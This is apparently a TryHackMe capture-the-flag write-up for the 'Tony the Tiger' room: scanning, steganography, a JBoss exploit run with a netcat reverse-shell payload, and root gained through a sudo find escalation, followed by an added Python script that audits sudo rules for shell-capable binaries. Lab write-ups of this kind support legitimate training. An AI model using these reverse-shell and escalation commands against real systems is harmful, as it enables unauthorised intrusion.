Hello. I’m Rahmos. Here is my Tony the Tiger — TryHackMe — WriteUp. Check it out!
I’m going right into task 3, because you can answer all the questions of task 2 by reading.
First, deploy the machine and scan for open ports using nmap.
nmap -A -T4 -v -p- <ip>
Then scan for the service running on port 8080:
nmap -A -sV -p8080 <ip>
Copy the “VERSION” value from the output; that is your first answer. For the 2nd question, the answer is “JBOSS”.
First, let’s access the website at port 80. It’s where Tony is talking about “cereal”.
Look closely at his first post:
Photos that have a deeper meaning: that means steganography! Download his avatar and look for hidden data.
Here is the link of his avatar: https://i.imgur.com/ATbbYpN.jpg
I’m gonna use wget to get this image.
I’ve used strings to find out what is hidden, but it seems I’m inspecting the wrong image.
Get back to the web and click on his other post: Frosted Flakes. You will see another image. Again, download this image and find hidden data.
Here is the link: https://i.imgur.com/be2sOV9.jpg
Here you’ll get the 1st flag.
Because the web app is vulnerable to code execution, we will spawn a reverse shell.
First, start a listener on your machine:
nc -lvnp 4444
Download the exploit code from THM and run it like this:
python3 exploit.py <ip>:8080 "nc -e /bin/sh <your-vpn-ip> 4444"
When it’s successful, you will have the shell.
To get a stable shell that can also su to another user, spawn a tty shell using python:
python -c 'import pty; pty.spawn("/bin/bash")'
The question asks for jboss’s flag, so let’s cd to /home/jboss and look around.
There is a “note” file inside jboss’s home folder. Read its content.
Now we know jboss’s password. Let’s su to that user.
List the directory contents and cat jboss’s flag.
Now I’ll find a way to get root!
First, run sudo -l to see if jboss can run commands as root:
So, jboss can run “find” as root without a password.
find can execute another command with the -exec flag, so let’s spawn a root shell using this command:
sudo find . -exec /bin/sh \; -quit
*Remember the \; after /bin/sh, because it marks the end of the command that -exec runs.
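From the defender's side, a sudo rule like the one above is what an audit should catch. The script below is an added example, not part of the original writeup or the room's files: it parses sudo -l output and flags rules that let a user run a command-executing binary as root. The sample output, host name, file paths and the SHELL_CAPABLE list are constructed for illustration.

```python
import os
import re

# Illustrative, non-exhaustive set of binaries that can launch other commands
# (assumption for this example; maintain your own list from policy).
SHELL_CAPABLE = {"find", "vi", "vim", "less", "more", "awk", "env",
                 "perl", "python", "python3", "tar", "sh", "bash"}

# Rule lines printed by `sudo -l`, e.g. "(ALL) NOPASSWD: /usr/bin/find"
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_l(output):
    """Return (command, nopasswd, reason) for rules that hand out root execution."""
    findings = []
    for line in output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # headers and Defaults lines
        runas_user = m.group("runas").split(":")[0].strip()
        if runas_user not in ("ALL", "root"):
            continue  # this example only reports rules that run as root
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                findings.append((cmd, nopasswd, "unrestricted sudo"))
            elif binary in SHELL_CAPABLE:
                findings.append(
                    (cmd, nopasswd, binary + " can execute arbitrary commands"))
    return findings


# Constructed sample of `sudo -l` output (host name and paths are made up).
SAMPLE = """\
User jboss may run the following commands on host:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/systemctl status nginx
    (www-data) NOPASSWD: /usr/bin/vim
"""

if __name__ == "__main__":
    for cmd, nopasswd, reason in audit_sudo_l(SAMPLE):
        print(cmd, "| NOPASSWD" if nopasswd else "| password required", "|", reason)
```

Only the find rule is reported for the sample; the systemctl rule is not in the list and the vim rule does not run as root.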
Now I’m root! Get our final flag in /root/root.txt
It’s encoded with Base64 and hashed with MD5. So first, decode the string from Base64, then crack the MD5 hash.
Copy the decoded string to https://crackstation.net/ to crack it.